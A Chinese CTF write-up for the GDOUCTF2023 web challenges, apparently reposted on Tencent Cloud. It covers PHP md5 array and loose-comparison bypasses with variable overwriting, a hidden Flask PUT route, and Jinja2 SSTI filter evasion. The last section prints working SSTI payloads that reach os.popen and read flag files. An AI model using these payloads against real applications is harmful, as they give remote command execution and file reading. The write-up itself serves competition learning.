前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
圈层
工具
发布
首页
学习
活动
专区
圈层
工具
MCP广场
社区首页 >专栏 >GDOUCTF2023 WriteUp

GDOUCTF2023 WriteUp

作者头像
ph0ebus
发布于 2023-05-16 03:09:33
发布于 2023-05-16 03:09:33
53200
代码可运行
举报
运行总次数:0
代码可运行
  • 前言

GDOUCTF 为广东海洋大学Hor1zon战队面向本校的第一次新生赛性质的校赛,比赛旨在选拔出有能力且志同道合的师傅加入战队,同时对海大校内学生普及信息安全知识,增强信息安全意识,提高网络空间安全创新能力与实践技能。

web方向AK,团队排名59,总的来说Web方向出的较简单,这里记录一手个人的题解记录,,NSSCTF平台可以复现

Web

hate eat snake

根据规则要玩 60 秒,但过几秒蛇的速度就激情起来了,根本把控不住

js代码经过了混淆,不能直接获得flag

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
if (this['getScore']() > -0x1e9 * -0xf + 0x5 * 0x6d + -0x2e * 0xaa)
                return alert(_0x324fcb(0x2d9, 0x2c3, 0x2db, 0x2f3) + 'k3r_h0pe_t' + _0xe4a674(0x5a1, 0x595, 0x59e, 0x57c) + 'irlfriend}'),
                ![];

那么这里要求60秒,查看分数的计算逻辑

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
getScore: function() {

    ///////////////////////
    var score = Math.round((this.timeCounter + new Date().getTime() - this.startTime) / 1000);
    /////////////////////////

    return score;
}

很容易只是单纯判断开始时间和当前时间的差值,那么这里就可以直接让程序开始运行后暂停60秒

这里使用浏览器的开发者工具中的调试功能完成

然后就能得到flag啦

看师傅们的wp还有很多办法,有长按空格键暂停的,还有下载 js 代码本地修改判断分数语句运行得flag的,还有修改Snake的原型链的方法得flag的,控制台运行Snake.prototype.getScore = () => 114514

受不了一点
代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
<?php
error_reporting(0);
header("Content-type:text/html;charset=utf-8");
if(isset($_POST['gdou'])&&isset($_POST['ctf'])){
    $b=$_POST['ctf'];
    $a=$_POST['gdou'];
    if($_POST['gdou']!=$_POST['ctf'] && md5($a)===md5($b)){
        if(isset($_COOKIE['cookie'])){
           if ($_COOKIE['cookie']=='j0k3r'){
               if(isset($_GET['aaa']) && isset($_GET['bbb'])){
                  $aaa=$_GET['aaa'];
                  $bbb=$_GET['bbb'];
                 if($aaa==114514 && $bbb==114514 && $aaa!=$bbb){
                   $give = 'cancanwordflag';
                   $get ='hacker!';
                   if(!isset($_GET['flag']) && !isset($_POST['flag'])){
                         die($give);
                    }
                   if($_POST['flag'] === 'flag' || $_GET['flag'] === 'flag'){
                       die($get);
                    }
                    foreach ($_POST as $key => $value) {
                        $$key = $value;
                   }
                    foreach ($_GET as $key => $value) {
                         $$key = $$value;
                    }
                   echo $flag;
            }else{
                  echo "洗洗睡吧";
                 }
    }else{
        echo "行不行啊细狗";
        }
  }
}
else {
  echo '菜菜';
}
}else{
  echo "就这?";
}
}else{
  echo "别来沾边";
}
?> 别来沾边

首先看第一圈和第二圈 if 判断,因为都是围绕gdouctf两个参数

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
if(isset($_POST['gdou'])&&isset($_POST['ctf'])){
    $b=$_POST['ctf'];
    $a=$_POST['gdou'];
    if($_POST['gdou']!=$_POST['ctf'] && md5($a)===md5($b)){

这里md5弱比较,直接一手数组绕过,POST传入gdou[]=1&ctf[]=2

然后看第三四圈 if 判断

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
if(isset($_COOKIE['cookie'])){
       if ($_COOKIE['cookie']=='j0k3r'){

设置Cookie头,Cookie: cookie=j0k3r

接着进入第五六圈 if 判断

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
if(isset($_GET['aaa']) && isset($_GET['bbb'])){
      $aaa=$_GET['aaa'];
      $bbb=$_GET['bbb'];
     if($aaa==114514 && $bbb==114514 && $aaa!=$bbb){

这里用PHP弱类型特性进行绕过,GET传参?aaa=114514&bbb=114514a

终于到了最后一坨

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
$give = 'cancanwordflag';
$get ='hacker!';
if(!isset($_GET['flag']) && !isset($_POST['flag'])){
     die($give);
}
if($_POST['flag'] === 'flag' || $_GET['flag'] === 'flag'){
   die($get);
}
foreach ($_POST as $key => $value) {
    $$key = $value;
}
foreach ($_GET as $key => $value) {
     $$key = $$value;
}
echo $flag;

这里if要求POST或者GET传入参数flag,特别注意POST和GET进入后,后面foreach的逻辑不同,相差一个$

使用GET传入则对传入的键值对进行遍历和变量覆盖,既然不能直接让flag=flag自己传给自己,那就找个中间人,给他之后再拿回来

所以GET传入hacker=flag&flag=hacker

最终payload

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
GET: ?aaa=114514&bbb=114514a&hacker=flag&flag=hacker
Header: Cookie: cookie=j0k3r
POST: gdou[]=1&ctf[]=2
EZ WEB

首先有一个点击按钮,点点看,提示Where's the flag? i swear it was around here somewhere,盲猜哪有源码泄露什么的

先查看源码,发现注释

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
<!-- /src -->

进到这个路由

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
import flask

app = flask.Flask(__name__)

@app.route('/', methods=['GET'])
def index():
  return flask.send_file('index.html')

@app.route('/src', methods=['GET'])
def source():
  return flask.send_file('app.py')

@app.route('/super-secret-route-nobody-will-guess', methods=['PUT'])
def flag():
  return open('flag').read()

这就很简单了,直接PUT请求方法往/super-secret-route-nobody-will-guess路由发包就可以了

这里可以用burpsuite随便抓个当前页面的包,然后改包发送即可

ez_ze

使用wappalyzer插件快速知道网站用的python的flask框架

盲猜SSTI,输入{{7*7}}测测是不是,回显Invalid input detected甚至这里被过滤了,可以用 Jinja2 的 {%...%} 语句装载一个循环控制语句来绕过,输入{%7*7%},这里报错了获取到了部分源码。其实是忘了不能这么写,

应该{%print(......)%} 的形式来代替 {{}}

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
File "/app/app.py", line 21, in get_flag
    if re.search(pattern, name):
        return render_template('index.html', error='Invalid input detected.')Open an interactive python shell in this frame
    else:
        # 使用用户输入进行模板渲染
        template = "Hello, $ {} $!".format(name)
        return render_template_string(template)

确信是SSTI了,那么开始测测过滤了神魔吧

这里直接给最后getshell拿到的后端代码了

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
# -*- coding: utf-8 -*- 
from flask import Flask, request, render_template, render_template_string 
import re 
app = Flask(__name__) 
@app.route('/') 
def index(): 
    return render_template('index.html') 
@app.route('/get_flag', methods=['POST']) 
def get_flag(): 
    name = request.form['name'] 
    # 进行过滤规则的检查 
    pattern = r"(\{\{|\}\}|popen|os|subprocess|application|getitem|flag\.txt|\.|_|\[|\]|\"|class|subclasses|mro|\\)" 
    if re.search(pattern, name): 
        return render_template('index.html', error='Invalid input detected.') 
    else: # 使用用户输入进行模板渲染 
        template = "Hello, $ {} $!".format(name) 
        return render_template_string(template) 
if __name__ == '__main__': 
    app.run(host='0.0.0.0',port=80,debug=True)

经过测试也可以发现过滤是相当狠的

所以这里利用jinja过滤器进行bypass(原理见这篇文章,这里直接给出payload)

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
{%set nine=dict(aaaaaaaaa=a)|join|count%}
{%set eighteen=nine+nine%}
{%set pop=dict(pop=a)|join%}
{%set xhx=(lipsum|string|list)|attr(pop)(eighteen)%}
{%set kg=(lipsum|string|list)|attr(pop)(nine)%}
{%set globals=(xhx,xhx,dict(globals=a)|join,xhx,xhx)|join%}
{%set get=(xhx,xhx,'metiteg'|reverse,xhx,xhx)|join%}
{%set s='so'|reverse%}
{%set cla=(xhx,xhx,'ssalc'|reverse,xhx,xhx)|join%}
{%set bas=(xhx,xhx,'esab'|reverse,xhx,xhx)|join%}
{%set bas=(xhx,xhx,'sessalcbus'|reverse,xhx,xhx)|join%}
{%set po='nepop'|reverse%}
{%set flag=(dict(cat=a)|join,kg,dict(flag=a)|join)|join%}
{%set read=dict(read=a)|join%}
{%print(lipsum|attr(globals)|attr(get)(s)|attr(po)('cat /f*')|attr(read)())%}

看到大佬们有github的fenjing工具一把梭的 @rbeopad

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
{%print(((lipsum|attr((%c’*11)%(95,95,103,108,111,98,97,108,115,95,95))|attr((%c’*11)%(95,95,103,101,116,105,116,101,109,95,95))((%c’*12)%(95,95,98,117,105,108,116,105,110,115,95,95))|attr((%c’*11)%(95,95,103,101,116,105,116,101,109,95,95))((%c’*4)%(101,118,97,108))))((%c’*42)%(95,95,105,109,112,111,114,116,95,95,40,39,111,115,39,41,46,112,111,112,101,110,40,39,99,97,116,32,47,102,108,97,103,39,41,46,114,101,97,100,40,41)))%}

还有巧妙利用没被过滤的|attr()拼接字符串的 @Cnily03

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
{%set u='%c'%95*2%}{%print(''|attr(u+'cla''ss'+u)|attr(u+'ba''se'+u)|attr(u+'su''bcla''sses'+u)()|attr(213)|attr(u+'i''n''i''t'+u)|attr(u+'glo''bal''s'+u)|attr('ge''t')(u+'bui''lti''ns'+u)|attr('ge''t')(u+'imp''ort'+u)('o''s')|attr('po''pen')('ca''t /f''lag')|attr('re''ad')())%}

本文采用CC-BY-SA-3.0协议,转载请注明出处 Author: ph0ebus

本文参与 腾讯云自媒体同步曝光计划,分享自作者个人站点/博客。
原始发表:2023-04-18,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 作者个人站点/博客 前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
暂无评论
推荐阅读
编辑精选文章
换一批
ImaginaryCTF 2022
这个比赛题量给到位,而且都算是可以接受的题目,考的内容涵盖也很多,非常值得学习一下,当然,我比赛过程中没出几道,菜鸡继续学习~~~
故里[TRUE]
2023/04/19
4540
ImaginaryCTF 2022
GDOUCTF 新生赛 wp
一个人打了一天,web太过简单了,AK 加起来没有misc一题分高,其他方向就浅浅会一点,最后就拿了个115名。
yulate
2023/05/09
3840
GDOUCTF 新生赛 wp
Dest0g3 520迎新赛
Dest0g3{e2d37eeb-bd8b-48d9-8444-75936cc51cb6}
故里[TRUE]
2023/04/19
8980
Dest0g3 520迎新赛
hitcon2016 web writeup
当大家在为祖国母亲庆生的时候,我在打lctf,当大家正为休息而搁置的事情忙碌的时候,我在打hitcon,不过虽然有点儿辛苦,但是一场国内的优质比赛加上顶级的国外比赛,还是让我打开了新世界的大门,orange菊苣大法叼…
LoRexxar
2023/02/21
3400
hitcon2016 web writeup
PlaidCTF 2017 web writeup
稍微整理下pctf2017的web writeup,各种假web题,有心的人一定能感受到这些年国外的ctf对于web题目的态度
LoRexxar
2023/02/21
6550
PlaidCTF 2017 web writeup
ctfshow 愚人杯2023
dataURL查看源码后base64解码即可得到index.php源码,里面有flag
ph0ebus
2023/05/16
1.1K0
ctfshow 愚人杯2023
关于flask的SSTI注入[通俗易懂]
ssti注入又称服务器端模板注入攻击(Server-Side Template Injection),和sql注入一样,也是由于接受用户输入而造成的安全问题。
全栈程序员站长
2022/09/27
2.8K1
关于flask的SSTI注入[通俗易懂]
SSTI漏洞基础分析
妥妥造成了信息泄露,但是还可以将危害扩大化,直接造成任意文件读取和RCE,在可以保证能看懂的情况下,我们得先学习python的魔术方法和继承关系,接下来细说~
vFREE
2022/04/01
6050
SSTI漏洞基础分析
【网络安全】「漏洞复现」(六)探索 Python 中原型链的利用与污染
本篇博文是《从0到1学习安全测试》中漏洞复现系列的第六篇博文,主要内容是通过具体案例的分析,探讨 Python 中出现的原型链利用和污染所涉及的安全问题,往期系列文章请访问博主的 安全测试 专栏;
sidiot
2024/07/14
4400
N1BOOK writeup
Nu1L Team写的<<从0到1:CTFer成长之路>>的题目在BUUOJ上都有了复现环境,简单看了看发现WEB的题目wp和环境都比较齐全,决定做一下并且写博客记录一下。
ek1ng
2022/08/10
5940
N1BOOK writeup
HCTF_2018-Writeup【web题】
经过上面的分析,大致可以看到对file的内容没有过滤,只判断了存在和字符串,所以可以使用文件包含读取flag,而关键点在_page 经过截断后返回true
Mirror王宇阳
2020/11/12
5190
HDCTF2023 Writeup
因为上石油工程认知只做了半小时题,赛后才来复现,和阿里云CTF和DASCTF x SU都堆一天了hhh
ph0ebus
2023/05/16
5340
LIT CTF 2022
Lexington Informatics Tournament CTF 2022
故里[TRUE]
2023/04/19
1.1K0
LIT CTF 2022
HDCTF 2023
NSSCTF{bba9bf40-827f-49b9-9f97-46e82f0e155a}
故里[TRUE]
2023/04/23
6800
Flask 框架基础知识笔记
内置过滤器: tojson配合js使用,注意这里要避免HTML自动转义,所以加上safe过滤器
王瑞MVP
2022/12/28
2.4K0
安网杯部分wp
web1 webshell上传 前端绕过。绕了半天才想起来是前端绕过。。burp改个后缀就好了 function checkFile() { var file = document.getElementsByName('upload_file')[0].value; if (file == null || file == "") { alert("请选择要上传的文件!"); return false; } //定义允许上传的文件类型 v
Khan安全团队
2021/05/28
9000
安网杯部分wp
TAMUCTF-2019 Write up
gets可以造成栈溢出,最终只需要劫持程序执行流到printflag函数就行,strncpy中将src拷贝到dest上可以覆盖栈上的v2指针,而two函数和printflag函数只有最后一个字节不同,所以不用再去爆破一个1/16
安恒网络空间安全讲武堂
2019/05/09
1.7K0
Python Flask 编程 | 连载 05 - Jinja2 模板引擎
在 MTV 模型中,T 既 Templates 模板,模板是一个包含响应文本的文件(通常是html文件),该文件中允许包含 ”占位变量“ 来表示动态的内容,其具体值会在请求的响应中给出。”占位变量“ 最终会被真实的值所替换。模板解析成相应的字符串,这一过程称为 ”渲染“。Flask 框架使用的是 Jinja2 模板引擎。
RiemannHypothesis
2022/09/26
1K0
Python Flask 编程 | 连载 05 - Jinja2 模板引擎
MTCTF-2022 部分WriteUp
本次比赛主力输出选手Article&Messa&Oolongcode,累计解题3Web,2Pwn,1Re,1Crypto
Timeline Sec
2022/10/05
9050
MTCTF-2022 部分WriteUp
Flask快速入门,知识整理
一、Flask介绍(轻量级的框架,非常快速的就能把程序搭建起来)   Flask是一个基于Python开发并且依赖jinja2模板和Werkzeug WSGI服务的一个微型框架,对于Werkzeug本质是Socket服务端,其用于接收http请求并对请求进行预处理,然后触发Flask框架,开发人员基于Flask框架提供的功能对请求进行相应的处理,并返回给用户,如果要返回给用户复杂的内容时,需要借助jinja2模板来实现对模板的处理,即:将模板和数据进行渲染,将渲染后的字符串返回给用户浏览器。 “微”(mic
用户1214487
2018/01/24
2K0
Flask快速入门,知识整理
相关推荐
ImaginaryCTF 2022
更多 >
LV.0
这个人很懒,什么都没有留下~
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档
本文部分代码块支持一键运行,欢迎体验
本文部分代码块支持一键运行,欢迎体验